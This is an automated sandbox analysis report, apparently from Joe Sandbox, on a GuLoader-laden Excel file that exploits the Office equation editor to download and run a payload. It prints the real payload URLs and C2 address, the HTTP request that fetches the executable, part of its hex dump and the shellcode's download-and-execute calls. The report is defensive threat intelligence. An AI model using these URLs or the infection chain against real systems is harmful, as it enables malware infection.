Edit tour

Windows Analysis Report
TransportLabel_6170453602.xlsx

Overview

General Information

Sample Name:	TransportLabel_6170453602.xlsx
Analysis ID:	624947
MD5:	1db66b406376f18434e1c02cbcf5c5e5
SHA1:	35741ca39d0d76a00fac1eaa720101d7bfd82cc5
SHA256:	a561efadb6bab1e3d4f5b0cdefaecc0c4afb382bfe3bde81e1dad0aefc76695c
Tags:	VelvetSweatshopxlsx
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Shellcode detected

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Downloads executable code via HTTP

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

PE file contains more sections than normal

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2452 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2644 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2156 cmdline: "C:\Users\Public\vbc.exe" MD5: D5E55A57372BCAD45FBB260105179CAF)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.149.13.182, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2644, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2644, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.1159273046.0000000003A50000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_QuCucbUMda229.bin"}

Multi AV Scanner detection for submitted file

Source: TransportLabel_6170453602.xlsx

ReversingLabs: Detection: 39%

Antivirus detection for URL or domain

Source: http://103.149.13.182/msdrive10/.svchost.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	Metadefender: Detection: 14%			Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe	ReversingLabs: Detection: 23%

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 103.149.13.182 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406850 FindFirstFileW,FindClose,	4_2_00406850
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405C26
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0357051B ShellExecuteExW,ExitProcess,	2_2_0357051B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03570435
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035704BA URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_035704BA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035703C5 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_035703C5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0357044F URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_0357044F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03570390 ExitProcess,	2_2_03570390
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03570504 ShellExecuteExW,ExitProcess,	2_2_03570504
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03570539 ExitProcess,	2_2_03570539
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035703A9 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_035703A9

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 103.149.13.182:80

Source: excel.exe

Memory has grown: Private usage: 8MB later: 62MB

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://barsam.com.au/bin_QuCucbUMda229.bin

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 May 2022 07:27:56 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Tue, 10 May 2022 23:41:34 GMTETag: "4fcbf-5deb0dd783b2f"Accept-Ranges: bytesContent-Length: 326847Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 0a 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 60 3d 00 08 59 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 66 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 78 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 d0 02 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 08 59 01 00 00 60 3d 00 00 5a 01 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /msdrive10/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.149.13.182Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03570435

Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182
Source: unknown	TCP traffic detected without corresponding DNS query: 103.149.13.182

Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exe
Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exeigh
Source: EQNEDT32.EXE, 00000002.00000002.958094475.0000000003570000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exej
Source: EQNEDT32.EXE, 00000002.00000002.957930611.0000000000544000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://103.149.13.182/msdrive10/.svchost.exemmC:
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: EQNEDT32.EXE, 00000002.00000002.957995043.0000000000602000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.957102265.000000000040A000.00000008.00000001.01000000.00000004.sdmp, .svchost[1].exe.2.dr, vbc.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: vbc.exe, 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp, wxbase30u_xml_gcc_custom.dll.4.dr, AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AEGISIIINVHelper.dll.4.dr, AsSQLHelper.dll.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE386947.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_03570435 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_03570435

Source: global traffic

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004056BB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_004056BB

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 8	Screenshot OCR: document is protected 17 18 ~ 19 20 ~ m p 21 e m m 22 23 0 , G) Open the document In If thi
Source: Screenshot number: 8	Screenshot OCR: protected documents the yellow bar above 26 27 28 0 q 29 Nr g I , )) -: .- .b > " 35 36

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Code function: 4_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_0040350A

Source: C:\Users\Public\vbc.exe

Code function: 4_2_734F1BFF

4_2_734F1BFF

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: .svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: wxbase30u_xml_gcc_custom.dll.4.dr

Static PE information: Number of sections : 12 > 10

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: TransportLabel_6170453602.xlsx

ReversingLabs: Detection: 39%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_0040350A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$TransportLabel_6170453602.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR581D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/26@0/1

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404967 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404967

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\SourceCode\GC3.UserExperienceImprovement\production_V4.2\Service\ServiceSDK\Release\UserExperienceImprovementPlugin\AsSQLHelper.pdb source: AsSQLHelper.dll.4.dr
Source:	Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIINVHelper.pdb source: AEGISIIINVHelper.dll.4.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match

